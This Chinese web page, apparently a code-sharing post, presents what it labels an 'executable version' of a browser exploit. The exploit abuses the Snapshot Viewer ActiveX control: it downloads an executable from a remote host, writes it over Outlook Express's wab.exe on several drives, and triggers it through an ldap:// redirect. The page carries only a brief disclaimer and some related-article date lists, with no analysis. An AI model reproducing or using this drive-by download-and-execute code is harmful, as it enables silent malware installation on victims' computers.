可执行版,请勿用于非法用途。
<script type="text/javascript">
function killErrors() {
return true;
}
window.onerror = killErrors;

var x;
var obj;
var mycars = new Array();
mycars[0] = "c:/Program Files/Outlook Express/wab.exe";
mycars[1] = "d:/Program Files/Outlook Express/wab.exe";
mycars[2] = "e:/Program Files/Outlook Express/wab.exe";

var objlcx = new ActiveXObject("snpvw.Snapshot Viewer Control.1");

if(objlcx="[object]")
{

setTimeout('window.location = "ldap://"',3000);

for (x in mycars)
{
obj = new ActiveXObject("snpvw.Snapshot Viewer Control.1")

var buf1 = 'http://192.168.8.10/333.exe';
var buf2=mycars[x];

obj.Zoom = 0;
obj.ShowNavigationButtons = false;
obj.AllowContextMenu = false;
obj.SnapshotPath = buf1;

try
{
 obj.CompressedPath = buf2;
 obj.PrintSnapshot();

}catch(e){}

}
}

</script>

相关文章:

  • 2022-12-23
  • 2022-12-23
  • 2022-03-07
  • 2021-12-15
  • 2021-12-13
  • 2022-02-14
猜你喜欢
  • 2022-12-23
  • 2022-03-09
  • 2021-12-27
  • 2021-06-27
  • 2022-12-23
  • 2021-09-09
相关资源
相似解决方案